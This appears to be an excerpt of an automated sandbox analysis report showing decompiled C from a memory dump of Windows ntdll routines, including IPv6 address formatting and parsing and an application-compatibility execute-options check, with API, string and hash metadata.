                                                                                                                                                      						if(_t114 == 0) {
                                                                                                                                                      							L33:
                                                                                                                                                      							_t115 = 0x912926;
                                                                                                                                                      							L35:
                                                                                                                                                      							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                      							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                      							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                      							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                      							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                      							goto L36;
                                                                                                                                                      						}
                                                                                                                                                      						if(_t114 != 0xffff) {
                                                                                                                                                      							_t116 = 0;
                                                                                                                                                      							goto L38;
                                                                                                                                                      						}
                                                                                                                                                      						if(_t114 != 0) {
                                                                                                                                                      							_t115 = 0x919cac;
                                                                                                                                                      							goto L35;
                                                                                                                                                      						}
                                                                                                                                                      						goto L33;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L5:
                                                                                                                                                      					_a8 = _t116;
                                                                                                                                                      					_a4 = _t116;
                                                                                                                                                      					_v12 = _t116;
                                                                                                                                                      					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                      						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                      							_v8 = 6;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t90 = _v8;
                                                                                                                                                      					if(_t90 <= _t116) {
                                                                                                                                                      						L11:
                                                                                                                                                      						if(_a8 - _a4 <= 1) {
                                                                                                                                                      							_a8 = _t116;
                                                                                                                                                      							_a4 = _t116;
                                                                                                                                                      						}
                                                                                                                                                      						_t91 = 0;
                                                                                                                                                      						if(_v8 <= _t116) {
                                                                                                                                                      							L22:
                                                                                                                                                      							if(_v8 < 8) {
                                                                                                                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                      								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                      							}
                                                                                                                                                      							return _t128;
                                                                                                                                                      						} else {
                                                                                                                                                      							L14:
                                                                                                                                                      							L14:
                                                                                                                                                      							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                      								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                      									_push(":");
                                                                                                                                                      									_push(_t71 - _t128 >> 1);
                                                                                                                                                      									_push(_t128);
                                                                                                                                                      									_t128 = _t128 + E00947707() * 2;
                                                                                                                                                      									_t71 = _v20;
                                                                                                                                                      									_t130 = _t130 + 0xc;
                                                                                                                                                      								}
                                                                                                                                                      								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                      								_t130 = _t130 + 0x10;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(L"::");
                                                                                                                                                      								_push(_t71 - _t128 >> 1);
                                                                                                                                                      								_push(_t128);
                                                                                                                                                      								_t78 = E00947707();
                                                                                                                                                      								_t130 = _t130 + 0xc;
                                                                                                                                                      								_t91 = _a8 - 1;
                                                                                                                                                      							}
                                                                                                                                                      							_t91 = _t91 + 1;
                                                                                                                                                      							_t128 = _t128 + _t78 * 2;
                                                                                                                                                      							_t71 = _v20;
                                                                                                                                                      							if(_t91 >= _v8) {
                                                                                                                                                      								goto L22;
                                                                                                                                                      							}
                                                                                                                                                      							_t116 = 0;
                                                                                                                                                      							goto L14;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t108 = 1;
                                                                                                                                                      						_v16 = _t129;
                                                                                                                                                      						_v24 = _t90;
                                                                                                                                                      						do {
                                                                                                                                                      							if( *_v16 == _t116) {
                                                                                                                                                      								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                      									_a4 = _v12;
                                                                                                                                                      									_a8 = _t108;
                                                                                                                                                      								}
                                                                                                                                                      								_t116 = 0;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v12 = _t108;
                                                                                                                                                      							}
                                                                                                                                                      							_v16 = _v16 + 2;
                                                                                                                                                      							_t108 = _t108 + 1;
                                                                                                                                                      							_t26 =  &_v24;
                                                                                                                                                      							 *_t26 = _v24 - 1;
                                                                                                                                                      						} while ( *_t26 != 0);
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}





















                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                      • Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                                                                                                                      • Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
                                                                                                                                                      • Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                                                                                                                      • Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E00947EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v540;
                                                                                                                                                      				unsigned int _v544;
                                                                                                                                                      				signed int _v548;
                                                                                                                                                      				intOrPtr _v552;
                                                                                                                                                      				char _v556;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				unsigned int _t46;
                                                                                                                                                      				unsigned int _t47;
                                                                                                                                                      				unsigned int _t52;
                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                      				unsigned int _t62;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                      				signed int _t73;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      
                                                                                                                                                      				_t33 =  *0x9f2088; // 0x774e5599
                                                                                                                                                      				_v8 = _t33 ^ _t73;
                                                                                                                                                      				_v548 = _v548 & 0x00000000;
                                                                                                                                                      				_t72 = _a4;
                                                                                                                                                      				if(E00947F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                      					__eflags = _v548;
                                                                                                                                                      					if(_v548 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t62 = _t72 + 0x24;
                                                                                                                                                      					E00963F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                      					_t71 = 0x214;
                                                                                                                                                      					_v544 = 0x214;
                                                                                                                                                      					E0091DFC0( &_v540, 0, 0x214);
                                                                                                                                                      					_t75 = _t74 + 0x20;
                                                                                                                                                      					_t46 =  *0x9f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                      					__eflags = _t46;
                                                                                                                                                      					if(_t46 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t47 = _v544;
                                                                                                                                                      					__eflags = _t47;
                                                                                                                                                      					if(_t47 == 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t47 - 0x214;
                                                                                                                                                      					if(_t47 >= 0x214) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t62);
                                                                                                                                                      					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                      					E00963F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                      					_t52 = E00920D27( &_v540, L"Execute=1");
                                                                                                                                                      					_t76 = _t75 + 0x1c;
                                                                                                                                                      					_push(_t62);
                                                                                                                                                      					__eflags = _t52;
                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                      						E00963F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                      						_t71 =  &_v540;
                                                                                                                                                      						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                      						_t77 = _t76 + 0x14;
                                                                                                                                                      						_v552 = _t56;
                                                                                                                                                      						__eflags = _t71 - _t56;
                                                                                                                                                      						if(_t71 >= _t56) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L10:
                                                                                                                                                      							_t62 = E00928375(_t71, 0x20);
                                                                                                                                                      							_pop(_t69);
                                                                                                                                                      							__eflags = _t62;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								 *_t62 = 0;
                                                                                                                                                      							}
                                                                                                                                                      							E00963F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                      							_t77 = _t77 + 0x10;
                                                                                                                                                      							E0098E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                      							__eflags = _t62;
                                                                                                                                                      							if(_t62 == 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t31 = _t62 + 2; // 0x2
                                                                                                                                                      							_t71 = _t31;
                                                                                                                                                      							__eflags = _t71 - _v552;
                                                                                                                                                      							if(_t71 >= _v552) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                      					_push(3);
                                                                                                                                                      					_push(0x55);
                                                                                                                                                      					E00963F92();
                                                                                                                                                      					_t38 = 1;
                                                                                                                                                      					L2:
                                                                                                                                                      					return E0091E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t38 = 0;
                                                                                                                                                      				goto L2;
                                                                                                                                                      			}




























                                                                                                                                                      APIs
                                                                                                                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
                                                                                                                                                      • ExecuteOptions, xrefs: 00963F04
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
                                                                                                                                                      • Execute=1, xrefs: 00963F5E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BaseDataModuleQuery
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 3901378454-484625025
                                                                                                                                                      • Opcode ID: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                                                                                                                      • Instruction ID: 3189309a9ed8af18215a5cbe5e6d5940eb83ac165bb499ce3c7a33bd8813e358
                                                                                                                                                      • Opcode Fuzzy Hash: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                                                                                                                      • Instruction Fuzzy Hash: B7419B7164061D7ADF20AB94DC85FEBB3BCAB94704F0005E5B505A61C1E771AB858F61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				char _t120;
                                                                                                                                                      				short _t121;
                                                                                                                                                      				void* _t128;
                                                                                                                                                      				intOrPtr* _t130;
                                                                                                                                                      				char _t132;
                                                                                                                                                      				short _t133;
                                                                                                                                                      				intOrPtr _t141;
                                                                                                                                                      				signed int _t156;
                                                                                                                                                      				signed int _t174;
                                                                                                                                                      				intOrPtr _t177;
                                                                                                                                                      				intOrPtr* _t179;
                                                                                                                                                      				intOrPtr _t180;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      
                                                                                                                                                      				_t179 = _a4;
                                                                                                                                                      				_t141 =  *_t179;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				if(_t141 == 0) {
                                                                                                                                                      					L41:
                                                                                                                                                      					 *_a8 = _t179;
                                                                                                                                                      					_t180 = _v24;
                                                                                                                                                      					if(_t180 != 0) {
                                                                                                                                                      						if(_t180 != 3) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t174 = _v32;
                                                                                                                                                      					if(_t174 == 0) {
                                                                                                                                                      						if(_v8 == 7) {
                                                                                                                                                      							goto L43;
                                                                                                                                                      						}
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					L43:
                                                                                                                                                      					if(_v16 != 1) {
                                                                                                                                                      						if(_v16 != 2) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                      						L47:
                                                                                                                                                      						if(_t174 != 0) {
                                                                                                                                                      							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                      							_t116 = 8;
                                                                                                                                                      							E0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t180 != 0) {
                                                                                                                                                      						if(_v12 > 3) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						_t120 = E00950CFA(_v28, 0, 0xa);
                                                                                                                                                      						_t183 = _t183 + 0xc;
                                                                                                                                                      						if(_t120 > 0xff) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                      						goto L47;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v12 > 4) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					_t121 = E00950CFA(_v28, _t180, 0x10);
                                                                                                                                                      					_t183 = _t183 + 0xc;
                                                                                                                                                      					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                      					goto L47;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t123 = _v16;
                                                                                                                                                      						if(_t123 == 0) {
                                                                                                                                                      							goto L7;
                                                                                                                                                      						}
                                                                                                                                                      						_t108 = _t123 - 1;
                                                                                                                                                      						if(_t108 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t178 = _t141;
                                                                                                                                                      						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                      							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
                                                                                                                                                      								if(_t141 != 0x3a) {
                                                                                                                                                      									if(_t141 == 0x2e) {
                                                                                                                                                      										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                      											goto L41;
                                                                                                                                                      										} else {
                                                                                                                                                      											_v24 = _v24 + 1;
                                                                                                                                                      											L27:
                                                                                                                                                      											_v16 = _v16 & 0x00000000;
                                                                                                                                                      											L28:
                                                                                                                                                      											if(_v28 == 0) {
                                                                                                                                                      												goto L20;
                                                                                                                                                      											}
                                                                                                                                                      											_t177 = _v24;
                                                                                                                                                      											if(_t177 != 0) {
                                                                                                                                                      												if(_v12 > 3) {
                                                                                                                                                      													L6:
                                                                                                                                                      													return 0xc000000d;
                                                                                                                                                      												}
                                                                                                                                                      												_t132 = E00950CFA(_v28, 0, 0xa);
                                                                                                                                                      												_t183 = _t183 + 0xc;
                                                                                                                                                      												if(_t132 > 0xff) {
                                                                                                                                                      													goto L6;
                                                                                                                                                      												}
                                                                                                                                                      												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                      												goto L20;
                                                                                                                                                      											}
                                                                                                                                                      											if(_v12 > 4) {
                                                                                                                                                      												goto L6;
                                                                                                                                                      											}
                                                                                                                                                      											_t133 = E00950CFA(_v28, 0, 0x10);
                                                                                                                                                      											_t183 = _t183 + 0xc;
                                                                                                                                                      											_v20 = _v20 + 1;
                                                                                                                                                      											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                      											goto L20;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t130 = _t179 + 1;
                                                                                                                                                      									if( *_t130 == _t141) {
                                                                                                                                                      										if(_v32 != 0) {
                                                                                                                                                      											goto L41;
                                                                                                                                                      										}
                                                                                                                                                      										_v32 = _v8 + 1;
                                                                                                                                                      										_t156 = 2;
                                                                                                                                                      										_v8 = _v8 + _t156;
                                                                                                                                                      										L34:
                                                                                                                                                      										_t179 = _t130;
                                                                                                                                                      										_v16 = _t156;
                                                                                                                                                      										goto L28;
                                                                                                                                                      									}
                                                                                                                                                      									_v8 = _v8 + 1;
                                                                                                                                                      									goto L27;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_v12 = _v12 + 1;
                                                                                                                                                      								if(_v24 > 0) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								_a7 = 1;
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							L20:
                                                                                                                                                      							_t179 = _t179 + 1;
                                                                                                                                                      							_t141 =  *_t179;
                                                                                                                                                      							if(_t141 == 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							}
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t141 == 0x3a) {
                                                                                                                                                      							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t130 = _t179 + 1;
                                                                                                                                                      								if( *_t130 != _t141) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								_v20 = _v20 + 1;
                                                                                                                                                      								_t156 = 2;
                                                                                                                                                      								_v32 = 1;
                                                                                                                                                      								_v8 = _t156;
                                                                                                                                                      								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                      								goto L34;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L8:
                                                                                                                                                      						if(_v8 > 7) {
                                                                                                                                                      							goto L41;
                                                                                                                                                      						}
                                                                                                                                                      						_t142 = _t141;
                                                                                                                                                      						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                      							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t128 = 1;
                                                                                                                                                      								_a7 = 1;
                                                                                                                                                      								_v28 = _t179;
                                                                                                                                                      								_v16 = 1;
                                                                                                                                                      								_v12 = 1;
                                                                                                                                                      								L39:
                                                                                                                                                      								if(_v16 == _t128) {
                                                                                                                                                      									goto L20;
                                                                                                                                                      								}
                                                                                                                                                      								goto L28;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_a7 = 0;
                                                                                                                                                      							_v28 = _t179;
                                                                                                                                                      							_v16 = 1;
                                                                                                                                                      							_v12 = 1;
                                                                                                                                                      							goto L20;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t123 = _t108 == 1;
                                                                                                                                                      				if(_t108 == 1) {
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				_t128 = 1;
                                                                                                                                                      				goto L39;
                                                                                                                                                      			}

























                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950bcd
                                                                                                                                                      0x00950b89
                                                                                                                                                      0x00950b89
                                                                                                                                                      0x00950b90
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b96
                                                                                                                                                      0x00950a04
                                                                                                                                                      0x00950a04
                                                                                                                                                      0x00950b9a
                                                                                                                                                      0x00950b9a
                                                                                                                                                      0x00950b9b
                                                                                                                                                      0x00950b9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950ba5
                                                                                                                                                      0x00950ac7
                                                                                                                                                      0x00950aca
                                                                                                                                                      0x0097eacf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eade
                                                                                                                                                      0x0097eade
                                                                                                                                                      0x0097eae3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eaf3
                                                                                                                                                      0x0097eaf6
                                                                                                                                                      0x0097eaf7
                                                                                                                                                      0x0097eafe
                                                                                                                                                      0x0097eb01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb01
                                                                                                                                                      0x0097eacf
                                                                                                                                                      0x00950ad0
                                                                                                                                                      0x00950ad4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950ada
                                                                                                                                                      0x00950ae6
                                                                                                                                                      0x00950c34
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c47
                                                                                                                                                      0x00950c49
                                                                                                                                                      0x00950c4a
                                                                                                                                                      0x00950c4e
                                                                                                                                                      0x00950c51
                                                                                                                                                      0x00950c54
                                                                                                                                                      0x00950c57
                                                                                                                                                      0x00950c5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c60
                                                                                                                                                      0x00950afb
                                                                                                                                                      0x00950afe
                                                                                                                                                      0x00950b02
                                                                                                                                                      0x00950b05
                                                                                                                                                      0x00950b08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b08
                                                                                                                                                      0x00950ae6
                                                                                                                                                      0x00950b44
                                                                                                                                                      0x009509f8
                                                                                                                                                      0x009509f8
                                                                                                                                                      0x009509f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eaa0
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
• Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID: .$:$:
                                                                                                                                                      • API String ID: 3965848254-2308638275
                                                                                                                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
                                                                                                                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E00950554(signed int _a4, char _a8) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int* _t49;
                                                                                                                                                      				signed int _t51;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				signed int _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				signed int _t81;
                                                                                                                                                      				signed int _t84;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				signed int _t96;
                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                      				signed int _t107;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				signed int _t115;
                                                                                                                                                      				signed int* _t119;
                                                                                                                                                      				void* _t125;
                                                                                                                                                      				void* _t126;
                                                                                                                                                      				signed int _t128;
                                                                                                                                                      				signed int _t130;
                                                                                                                                                      				signed int _t138;
                                                                                                                                                      				signed int _t144;
                                                                                                                                                      				void* _t158;
                                                                                                                                                      				void* _t159;
                                                                                                                                                      				void* _t160;
                                                                                                                                                      
                                                                                                                                                      				_t96 = _a4;
                                                                                                                                                      				_t115 =  *(_t96 + 0x28);
                                                                                                                                                      				_push(_t138);
                                                                                                                                                      				if(_t115 < 0) {
                                                                                                                                                      					_t105 =  *[fs:0x18];
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
